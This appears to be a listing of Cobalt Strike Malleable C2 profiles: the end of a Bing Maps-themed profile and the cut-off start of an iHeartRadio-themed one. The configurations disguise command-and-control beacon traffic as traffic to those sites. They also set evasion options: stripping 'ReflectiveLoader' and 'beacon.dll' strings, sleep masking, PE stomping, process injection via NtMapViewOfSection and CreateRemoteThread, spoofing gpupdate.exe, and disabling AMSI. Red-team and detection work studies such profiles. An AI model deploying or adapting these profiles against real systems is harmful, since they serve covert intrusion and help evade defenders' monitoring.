301 | \"categoryId\": 90940, | |
302 | \"bucketId\": 329, | |
303 | \"entry\": \"MarinaPoint\" | |
304 | }, | |
305 | { | |
306 | \"categoryId\": 90650, | |
307 | \"bucketId\": 1365, | |
308 | \"entry\": \"BookstorePoint\" | |
309 | }, | |
310 | { | |
311 | \"categoryId\": 91533, | |
312 | \"bucketId\": 271, | |
313 | \"entry\": \"BowlingPoint\" | |
314 | }, | |
315 | { | |
316 | \"categoryId\": 91647, | |
317 | \"bucketId\": 1382, | |
318 | \"entry\": \"ZXlJeU1EWWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFNU9Td2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTk1USXVOUzA1YUMweU5TNHhZeTB4TGpjc01DMHpMakVzTVM0MExUTXVNU3d6TGpGV05TNDVZekFzTVM0M0xERXVOQ3d6TGpFc015NHhMRE11TVdneU5TNHhJQ0FnWXpFdU55d3dMRE11TVMweExqUXNNeTR4TFRNdU1WWXROUzQ1UXpFMUxqWXROeTQyTERFMExqSXRPU3d4TWk0MUxUbDZJQ0lzSW1acGJHeFdZV3gxWlVsa0lqb3lNU3dpYzNSeWIydGxWbUZzZFdWSlpDSTZNU3dpYzNSeWIydGxWMmxrZEdnaU9qRXNJbk4wY205clpWTmpZV3hsVUdGc1pYUjBaVXRsZVVsa0lqb3RNU3dpY21WamIzSmtWSGx3WlNJNklsQmhkR2dpZlE9PQ\" | |
319 | }, | |
320 | { | |
321 | \"categoryId\": 255, | |
322 | \"bucketId\": 254, | |
323 | \"entry\": \"Transit\" | |
324 | }, | |
325 | { | |
326 | \"categoryId\": 257, | |
327 | \"bucketId\": 253, | |
328 | \"entry\": \"Transit\" | |
329 | }, | |
330 | { | |
331 | \"categoryId\": 264, | |
332 | \"bucketId\": 243, | |
333 | \"entry\": \"Transit\" | |
334 | }, | |
335 | { | |
336 | \"categoryId\": 263, | |
337 | \"bucketId\": 241, | |
338 | \"entry\":"; | |
339 | ||
340 | ||
341 | ||
342 | ||
343 | ||
344 | append " }, | |
345 | { | |
346 | \"categoryId\": 266, | |
347 | \"bucketId\": 236, | |
348 | \"entry\": \"Transit\" | |
349 | }, | |
350 | { | |
351 | \"categoryId\": 251, | |
352 | \"bucketId\": 252, | |
353 | \"entry\": \"Transit\" | |
354 | }, | |
355 | { | |
356 | \"categoryId\": 265, | |
357 | \"bucketId\": 242, | |
358 | \"entry\": \"Transit\" | |
359 | }, | |
360 | { | |
361 | \"categoryId\": 253, | |
362 | \"bucketId\": 251, | |
363 | \"entry\": \"Transit\" | |
364 | }, | |
365 | { | |
366 | \"categoryId\": 254, | |
367 | \"bucketId\": 250, | |
368 | \"entry\": \"ZXlJek1DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TkRJNUxDSnphR0Z3WlZCaGJHVjBkR1ZMWlhsSlpDSTZORE13TENKblpXOXRaWFJ5ZVZOMGNtbHVaeUk2SWsweE15MHdMakF4TkRZeE1ESTVZekFzTWk0eE9UZ3RNU3cwTGpFek1TMHlMalV4TWl3MUxqSTRNVU0zTGpjeU5pdzNMakUzTWpNNUxETXVOelUwTERjdU9UZzFNemtzTUN3M0xqazROVE01Y3kwM0xqY3lOaTB3TGpneE15MHhNQzQwT0RndE1pNDNNVGxETFRFeUxEUXVNVEUyTXprdE1UTXNNaTR4T0RNek9TMHhNeTB3TGpBeE5EWXhNREk1WXpBdE1pNHhPVGNzTVMwMExqRXpNaXd5TGpVeE1pMDFMakk0TVVNdE55NDNNall0Tnk0eU1EQTJNUzB6TGpjMU5DMDRMakF4TkRZeExEQXRPQzR3TVRRMk1YTTNMamN5Tml3d0xqZ3hOQ3d4TUM0ME9EZ3NNaTQzTVRrZ0lFTXhNaTAwTGpFME5qWXhMREV6TFRJdU1qRXhOakVzTVRNdE1DNHdNVFEyTVRBeU9Yb2lMQ0ptYVd4c1ZtRnNkV1ZKWkNJNk5URXNJbk4wY205clpWWmhiSFZsU1dRaU9qVXlMQ0p6ZEhKdmEyVlhhV1IwYUNJNk1Td2ljM1J5YjJ0bFUyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9pMHhMQ0p5WldOdmNtUlVlWEJsSWpvaVVHRjBhQ0o5TEhzaWMyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9qUXpNaXdpYzJoaGNHVlFZV3hsZEhSbFMyVjVTV1FpT2pRek15d2liR1ZtZEZSdmNDSTZleUo0SWpvdE9TNHpOekF4TENKNUlqb3RPQzR3T0RNd01EaDlMQ0p5YVdkb2RFSnZkSFJ2YlNJNmV5SjRJam94TUM0ek56QXhNeXdpZVNJNk9DNHdPRE13TURoOUxDSjBaWGgwVTNSNWJHVWlPbnNpWm05dWRFWmhiV2xzZVVsa0lqbzRMQ0ptYjI1MFUybDZaU0k2T1N3aWJXbHVhVzExYlVadmJuUlRhWHBsSWpvNUxDSm9aV2xuYUhSTllYUmphRTF2WkdVaU9qQXNJbWhsYVdkb2RFMWhkR05vVUdsNFpXeHpJam93TENKbWIyNTBVM1I1YkdVaU9qQXNJblJsZUhSRWNtRjNVMlYwZEdsdVozTWlPakFzSW1OdmJHOXlWbUZzZFdWSlpDSTZOVE1zSW1kc2IzZFRhWHBsSWpvekxDSnpaV052Ym1SSGJHOTNVMmw2WlNJNk9Td2lZV3h3YUdGR2JHOXZjaUk2TVRjMUxDSm5iRzkzUTI5c2IzSldZV3gxWlVsa0lqbzNMQ0p2ZFhSc2FXNWxRMjlzYjNKV1lXeDFaVWxrSWpvM0xDSnZkWFJzYVc1bFYybGtkR2dpT2pCOUxDSnpkSEpwYm1kVGIzVnlZMlZKWkNJNk5ETTBMQ0p6ZEhKcGJtZFRiM1Z5WTJWVWVYQmxJam95TENKb2IzSnBlbTl1ZEdGc1FXeHBaMjV0Wlc1MElqb3dMQ0oyWlhKMGFXTmhiRUZzYVdkdWJXVnVkQ0k2TUN3aWFHOXlhWHB2Ym5SaGJFRjFkRzlUWTJGc2FXNW5Jam94TENKMlpYSjBhV05oYkVGMWRHOVRZMkZzYVc1bklqb3hMQ0p5WldOdmNtUlVlWEJsSWpvaVZHVjRkQ0o5WFgxOWZRPT0=\" | |
369 | }, | |
370 | { | |
371 | \"categoryId\": 260, | |
372 | \"bucketId\": 229, | |
373 | \"entry\": \"Transit\" | |
374 | }, | |
375 | { | |
376 | \"categoryId\": 267, | |
377 | \"bucketId\": 226, | |
378 | \"entry\": \"Transit\" | |
379 | }, | |
380 | { | |
381 | \"categoryId\": 252, | |
382 | \"bucketId\": 249, | |
383 | \"entry\": \"Transit\" | |
384 | }, | |
385 | { | |
386 | \"categoryId\": 91714, | |
387 | \"bucketId\": 66, | |
388 | \"entry\": \"FinancialPoint\" | |
389 | }, | |
390 | { | |
391 | \"categoryId\": 203, | |
392 | \"bucketId\": 248, | |
393 | \"entry\": \"ZXlJek16TWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFNU9Td2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTk5TNDVMVGxJTFRVdU9VTXROeTQyTFRrdE9TMDNMall0T1MwMUxqbFdOUzQ1UXkwNUxEY3VOaTAzTGpZc09TMDFMamtzT1VnMUxqbEROeTQyTERrc09TdzNMallzT1N3MUxqbFdMVFV1T1NBZ0lFTTVMVGN1Tml3M0xqWXRPU3cxTGprdE9VdzFMamt0T1hvZ0lpd2labWxzYkZaaGJIVmxTV1FpT2pJeExDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlMSHNpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pJd01pd2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTkxUY3VOeXcxTGpsak1Dd3hMREF1T0N3eExqZ3NNUzQ0TERFdU9FZzFMamxqTVN3d0xERXVPQzB3TGpnc01TNDRMVEV1T0ZZdE5TNDVZekF0TVMwd0xqZ3RNUzQ0TFRFdU9DMHhMamhJTFRVdU9TQWdJQ0JqTFRFc01DMHhMamdzTUM0NExURXVPQ3d4TGpoV05TNDVlaUFnSWl3aVptbHNiRlpoYkhWbFNXUWlPakl5TENKemRISnZhMlZXWVd4MVpVbGtJam94TENKemRISnZhMlZYYVdSMGFDSTZNU3dpYzNSeWIydGxVMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPaTB4TENKeVpXTnZjbVJVZVhCbElqb2lVR0YwYUNKOUxIc2ljMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPakl3TkN3aWMyaGhjR1ZRWVd4bGRIUmxTMlY1U1dRaU9qSXdOU3dpWjJWdmJXVjBjbmxUZEhKcGJtY2lPaUpOTWk0MUxEWXVNMmd5TGpOTU1pNDJMRE11Tm1Nd0xqWXRNQzR4TERFdE1DNHpMREV0TUM0NFl6QXNNQ3d3TFRJdU1Td3dMakV0TXk0Mll6QXVNUzB4TGpjc01DMHlMaklzTUMweUxqSkRNeTQzTFRNdU55d3pMakl0TkM0eUxESXVOQzAwTGpJZ0lDQm9MVEoyTFRFdU1XZ3lMakYyTFRBdU9XZ3ROUzR6ZGpBdU9XZ3lMakYyTVM0eGFDMHhMamxqTFRBdU9Dd3dMVEV1TWl3d0xqVXRNUzQwTERFdU1tTXdMREFzTUN3d0xqY3NNQ3d5TGpKak1DNHhMREV1Tml3d0xqRXNNeTQxTERBdU1Td3pMalZqTUN3d0xqWXNNQzQxTERBdU9Td3hMakVzTUM0NUlDQWdiQzB5TGpJc01pNDJhREl1TTJ3eExqUXRNaTQyYURJdU1rd3lMalVzTmk0emVpQk5NaTQxTERJdU1XTXdMREF1TkMwd0xqTXNNQzQzTFRBdU55d3dMamRETVM0MExESXVPQ3d4TERJdU5Dd3hMREl1TVhNd0xqTXRNQzQzTERBdU55MHdMamRETWk0eExERXVNeXd5TGpVc01TNDNMREl1TlN3eUxqRjZJQ0FnSUUwdE1pNDBMVEl1TldNd0xUQXVNaXd3TGpJdE1DNDBMREF1TkMwd0xqUm9OR013TGpJc01Dd3dMalFzTUM0eUxEQXVOQ3d3TGpSMk15NHhhQzAwTGpoRExUSXVOQ3d3TGpZdE1pNDBMVEl1TlMweUxqUXRNaTQxZWlCTkxURXVOeXd4TGpORExURXVNeXd4TGpNdE1Td3hMamN0TVN3eUxqRWdJQ0J6TFRBdU15d3dMamN0TUM0M0xEQXVOMk10TUM0MExEQXRNQzQzTFRBdU15MHdMamN0TUM0M1F5MHlMalVzTVM0M0xUSXVNU3d4TGpNdE1TNDNMREV1TTNvZ0lpd2labWxzYkZaaGJIVmxTV1FpT2pJekxDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlYWDE5ZlE9PQ==\" | |
394 | }, | |
395 | { | |
396 | \"categoryId\": 91754, | |
397 | \"bucketId\": 65, | |
398 | \"entry\": \"Transit\" | |
399 | }, | |
400 | { | |
401 | \"categoryId\": 205, | |
402 | \"bucketId\": 247, | |
403 | \"entry\": \"Transit\" | |
404 | }, | |
405 | { | |
406 | \"categoryId\": 91649, | |
407 | \"bucketId\": 281, | |
408 | \"entry\": \"CafePoint\" | |
409 | }, | |
410 | { | |
411 | \"categoryId\": 91562, | |
412 | \"bucketId\": 1366, | |
413 | \"entry\": \"CampPoint\" | |
414 | }, | |
415 | { | |
416 | \"categoryId\": 90977, | |
417 | \"bucketId\": 331, | |
418 | \"entry\": \"\" | |
419 | }, | |
420 | { | |
421 | \"categoryId\": 90903, | |
422 | \"bucketId\": 274, | |
423 | \"entry\": \"AutomobileRentalPoint\" | |
424 | }, | |
425 | { | |
426 | \"categoryId\": 90024, | |
427 | \"bucketId\": 303, | |
428 | \"entry\": \"CasinoPoint\" | |
429 | }, | |
430 | { | |
431 | \"categoryId\": 91622, | |
432 | \"bucketId\": 1839, | |
433 | \"entry\": \"AttractionPoint\" | |
434 | }, | |
435 | { | |
436 | \"categoryId\": 91252, | |
437 | \"bucketId\": 1846, | |
438 | \"entry\": \"PalacePoint\" | |
439 | }, | |
440 | { | |
441 | \"categoryId\": 90619, | |
442 | \"bucketId\": 1847, | |
443 | \"entry\": \"ZXlJek5qTWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFek5EZ3NJbk5vWVhCbFVHRnNaWFIwWlV0bGVVbGtJam94TXpRNUxDSmpXQ0k2TUN3aVkxa2lPakFzSW5KWUlqb3dMQ0p5V1NJNk1Dd2lZMjlzYjNKV1lXeDFaVWxrSWpveU56Y3NJbXh2WTJ0WFNGSmhkR2x2SWpwMGNuVmxMQ0p5WldOdmNtUlVlWEJsSWpvaVJtbHNiR1ZrUld4c2FYQnpaU0o5TEhzaWMyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9qRXpORGdzSW5Ob1lYQmxVR0ZzWlhSMFpVdGxlVWxrSWpveE16UTVMQ0pqV0NJNk1Dd2lZMWtpT2pBc0luSllJam93TENKeVdTSTZNQ3dpYkdsdVpWTjBlV3hsSWpwN0ltTnZiRzl5Vm1Gc2RXVkpaQ0k2TWpjNExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aVpHRnphR1Z6VEdsemRDSTZXMTBzSW1OdmJYQnZkVzVrUVhKeVlYbE1hWE4wSWpwYlhYMHNJbXh2WTJ0WFNGSmhkR2x2SWpwMGNuVmxMQ0p6ZEhKdmEyVlRZMkZzWlZCaGJHVjBkR1ZMWlhsSlpDSTZNVE0xTVN3aWNtVmpiM0prVkhsd1pTSTZJa1ZzYkdsd2MyVWlmU3g3SW5OallXeGxVR0ZzWlhSMFpVdGxlVWxrSWpveE16VXpMQ0p6YUdGd1pWQmhiR1YwZEdWTFpYbEpaQ0k2TVRNMU5Dd2laMlZ2YldWMGNubFRkSEpwYm1jaU9pSk5OQzQwTFRNdU5tTXdMakl0TUM0eUxEQXVNaTB3TGpVc01DMHdMamRqTFRBdU1pMHdMakl0TUM0MUxUQXVNaTB3TGpjc01Fd3dMamd0TVM0MWFERXVORU15TGpJdE1TNDFMRFF1TkMwekxqWXNOQzQwTFRNdU5ub2dUVFF0TUM0MWFDMDRJQ0JqTFRBdU15d3dMVEF1TlN3d0xqSXRNQzQxTERBdU5XTXdMREl1TlN3eUxEUXVOU3cwTGpVc05DNDFjelF1TlMweUxEUXVOUzAwTGpWRE5DNDFMVEF1TXl3MExqTXRNQzQxTERRdE1DNDFlaUJOTVN3eUxqVklNQzQxVmpOak1Dd3dMak10TUM0eUxEQXVOUzB3TGpVc01DNDFJQ0JUTFRBdU5Td3pMak10TUM0MUxETldNaTQxU0MweFl5MHdMak1zTUMwd0xqVXRNQzR5TFRBdU5TMHdMalZUTFRFdU15d3hMalV0TVN3eExqVm9NQzQxVmpGak1DMHdMak1zTUM0eUxUQXVOU3d3TGpVdE1DNDFVekF1TlN3d0xqY3NNQzQxTERGMk1DNDFTREVnSUdNd0xqTXNNQ3d3TGpVc01DNHlMREF1TlN3d0xqVlRNUzR6TERJdU5Td3hMREl1TlhvaUxDSm1hV3hzVm1Gc2RXVkpaQ0k2TWpjNUxDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlYWDE5ZlE9PQ===\" | |
444 | }, | |
445 | { | |
446 | \"categoryId\": 91703, | |
447 | \"bucketId\": 1849, | |
448 | \"entry\": \"CommunityPoint\" | |
449 | }, | |
450 | { | |
451 | \"categoryId\": 90386, | |
452 | \"bucketId\": 1367, | |
453 | \"entry\": \"ClinicPoint\" | |
454 | }, | |
455 | { | |
456 | \"categoryId\": 90188, | |
457 | \"bucketId\": 295, | |
458 | \"entry\": \"EducationPoint\" | |
459 | }, | |
460 | { | |
461 | \"categoryId\": 90584, | |
462 | \"bucketId\": 310, | |
463 | \"entry\": \"CommunityPoint\" | |
464 | }"; | |
465 | ||
466 | print; | |
467 | } | |
468 | } | |
469 | } | |
470 | ||
471 | ||
472 | ||
473 | ###HTTP-Stager Block### | |
474 | http-stager { | |
475 | set uri_x86 "/maps/overlayBFPR"; | |
476 | set uri_x64 "/maps/overlayBfpr"; | |
477 | ||
478 | client { | |
479 | ||
480 | header "Host" "www.bing.com"; | |
481 | header "Accept" "*/*"; | |
482 | header "Accept-Language" "en-US,en;q=0.5"; | |
483 | header "Connection" "close"; | |
484 | } | |
485 | ||
486 | server { | |
487 | ||
488 | header "Cache-Control" "public"; | |
489 | header "Content-Type" "text/html;charset=utf-8"; | |
490 | header "Vary" "Accept-Encoding"; | |
491 | header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\""; | |
492 | header "X-MSEdge-Ref" "Ref A: 20D7023F5A1946FFA6E18C00CC8216CF Ref B: DALEDGE0815"; | |
493 | header "Connection" "close"; | |
494 | ||
495 | output { | |
496 | ||
497 | print; | |
498 | } | |
499 | } | |
500 | } | |
501 | ||
502 | ||
503 | ###Malleable PE/Stage Block### | |
504 | stage { | |
505 | set checksum "0"; | |
506 | set compile_time "12 Dec 2019 02:52:11"; | |
507 | set entry_point "170000"; | |
508 | #set image_size_x86 "6586368"; | |
509 | #set image_size_x64 "6586368"; | |
510 | #set name "WWanMM.dll"; | |
511 | set userwx "false"; | |
512 | set cleanup "true"; | |
513 | set sleep_mask "true"; | |
514 | set stomppe "true"; | |
515 | set obfuscate "true"; | |
516 | set rich_header ""; | |
517 | ||
518 | set sleep_mask "true"; | |
519 | ||
520 | set smartinject "true"; | |
521 | ||
522 | set module_x86 "wwanmm.dll"; | |
523 | set module_x64 "wwanmm.dll"; | |
524 | ||
525 | transform-x86 { | |
526 | prepend "\x90\x90\x90"; | |
527 | strrep "ReflectiveLoader" ""; | |
528 | strrep "beacon.dll" ""; | |
529 | } | |
530 | ||
531 | transform-x64 { | |
532 | prepend "\x90\x90\x90"; | |
533 | strrep "ReflectiveLoader" ""; | |
534 | strrep "beacon.x64.dll" ""; | |
535 | } | |
536 | ||
537 | #string "something"; | |
538 | #data "something"; | |
539 | #stringw "something"; | |
540 | } | |
541 | ||
542 | ###Process Inject Block### | |
543 | process-inject { | |
544 | ||
545 | set allocator "NtMapViewOfSection"; | |
546 | ||
547 | set min_alloc "16700"; | |
548 | ||
549 | set userwx "false"; | |
550 | ||
551 | set startrwx "true"; | |
552 | ||
553 | transform-x86 { | |
554 | prepend "\x90\x90\x90"; | |
555 | } | |
556 | transform-x64 { | |
557 | prepend "\x90\x90\x90"; | |
558 | } | |
559 | ||
560 | execute { | |
561 | #CreateThread; | |
562 | #CreateRemoteThread; | |
563 | ||
564 | CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; | |
565 | ||
566 | SetThreadContext; | |
567 | ||
568 | NtQueueApcThread-s; | |
569 | ||
570 | #NtQueueApcThread; | |
571 | ||
572 | CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; | |
573 | ||
574 | RtlCreateUserThread; | |
575 | } | |
576 | } | |
577 | ||
578 | ###Post-Ex Block### | |
579 | post-ex { | |
580 | ||
581 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
582 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
583 | ||
584 | set obfuscate "true"; | |
585 | ||
586 | set smartinject "true"; | |
587 | ||
588 | set amsi_disable "true"; | |
589 | ||
590 | } |
0 | #iheartradio | |
1 | #chose a popular top 40 station 'hit-nation'.. | |
2 | #xx0hcd | |
3 | ||
4 | set sleeptime "30000"; | |
5 | set jitter "20"; | |
6 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)"; | |
7 | set dns_idle "8.8.8.8"; | |
8 | set maxdns "235"; | |
9 | ||
10 | #custom cert | |
11 | #https-certificate { | |
12 | # set keystore "your_store_file.store"; | |
13 | # set password "your_store_pass"; | |
14 | #} | |
15 | ||
16 | http-config { | |
17 | # set headers "Server, Content-Type, Cache-Control, Connection"; | |
18 | # header "Content-Type" "text/html;charset=UTF-8"; | |
19 | # header "Connection" "close"; | |
20 | # header "Cache-Control" "max-age=2"; | |
21 | # header "Server" "nginx"; | |
22 | #set "true" if teamserver is behind redirector | |
23 | set trust_x_forwarded_for "false"; | |
24 | } | |
25 | ||
26 | http-get { | |
27 | ||
28 | set uri "/live/hit-nation-4222/"; | |
29 | ||
30 | client { | |
31 | ||
32 | header "Host" "www.iheart.com"; | |
33 | header "Accept" "*/*"; | |
34 | header "Accept-Language" "en-US"; | |
35 | header "Connection" "close"; | |
36 | ||
37 | ||
38 | metadata { | |
39 | base64url; | |
40 | ||
41 | prepend "GED_PLAYLIST_ACTIVITY="; | |
42 | prepend "_gads=ID=53c4a:S=ALNI_M32;"; | |
43 | prepend "uid=1492;"; | |
44 | prepend "pid=3913;"; | |
45 | prepend "ihr_c=US;id=HdqX;"; | |
46 | header "Cookie"; | |
47 | ||
48 | } | |
49 | ||
50 | } | |
51 | ||
52 | server { | |
53 | ||
54 | header "Content-Type" "text/html; charset=utf-8"; | |
55 | header "Edge-Control" "cache-maxage=3600"; | |
56 | header "Server" "nginx/1.4.6 (Ubuntu)"; | |
57 | header "X-Powered-By" "Express"; | |
58 | header "Access-Control-Allow-Origin" "*"; | |
59 | header "Accept-Ranges" "bytes"; | |
60 | header "Via" "1.1 varnish"; | |
61 | header "Age" "315"; | |
62 | header "Connection" "close"; | |
63 | header "X-Served-By" "cache-dfw1822-DFW"; | |
64 | header "X-Cache" "HIT"; | |
65 | header "X-Cache-Hits" "1"; | |
66 | header "X-Timer" "S1499866924.089752,VS0,VE1"; | |
67 | ||
68 | ||
69 | output { | |
70 | ||
71 | base64url; | |
72 | ||
73 | prepend "<!DOCTYPE html> | |
74 | <html lang='en' xmlns:fb='http://ogp.me/ns/fb'> | |
75 | <head> | |
76 | <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title> | |
77 | <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/> | |
78 | <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today's Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 & Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 & Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/> | |
79 | <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid="; | |
80 | ||
81 | ||
82 | append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 & Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today's Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/> | |
83 | <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link> | |
84 | </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div> | |
85 | <div id='jw-wrapper' class='hidden'> | |
86 | <div id='jw-player'></div> | |
87 | </div> | |
88 | <div id='ads-wrapper' class='hidden'> | |
89 | <a id='ads-learn-more' target='_blank'>Learn More</a> | |
90 | <div id='ads-player'></div> | |
91 | </div> | |
92 | <script src=/a/locale/?rel=7.33.1></script> | |
93 | <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
94 | <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
95 | </body> | |
96 | </html>"; | |
97 | ||
98 | print; | |
99 | } | |
100 | } | |
101 | } | |
102 | ||
103 | http-post { | |
104 | ||
105 | set uri "/Live/hit-nation-4222/"; | |
106 | set verb "GET"; | |
107 | ||
108 | client { | |
109 | ||
110 | header "Host" "www.iheart.com"; | |
111 | header "Accept" "*/*"; | |
112 | ||
113 | output { | |
114 | base64url; | |
115 | ||
116 | prepend "GED_PLAYLIST_ACTIVITY="; | |
117 | prepend "_gads=ID=53c4a:S=ALNI_M32;"; | |
118 | prepend "uid=1492;"; | |
119 | prepend "pid=3913;"; | |
120 | prepend "ihr_c=US;id=HdqX;"; | |
121 | header "Cookie"; | |
122 | ||
123 | ||
124 | } | |
125 | ||
126 | ||
127 | id { | |
128 | base64url; | |
129 | ||
130 | parameter "autoplay"; | |
131 | ||
132 | } | |
133 | } | |
134 | ||
135 | server { | |
136 | ||
137 | header "Content-Type" "text/html; charset=utf-8"; | |
138 | header "Edge-Control" "cache-maxage=3600"; | |
139 | header "Server" "nginx/1.4.6 (Ubuntu)"; | |
140 | header "X-Powered-By" "Express"; | |
141 | header "Access-Control-Allow-Origin" "*"; | |
142 | header "Accept-Ranges" "bytes"; | |
143 | header "Via" "1.1 varnish"; | |
144 | header "Age" "315"; | |
145 | header "Connection" "close"; | |
146 | header "X-Served-By" "cache-dfw1822-DFW"; | |
147 | header "X-Cache" "HIT"; | |
148 | header "X-Cache-Hits" "1"; | |
149 | header "X-Timer" "S1499866924.089752,VS0,VE1"; | |
150 | ||
151 | #just keeping output together for responses | |
152 | output { | |
153 | base64; | |
154 | ||
155 | prepend "<!DOCTYPE html> | |
156 | <html lang='en' xmlns:fb='http://ogp.me/ns/fb'> | |
157 | <head> | |
158 | <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title> | |
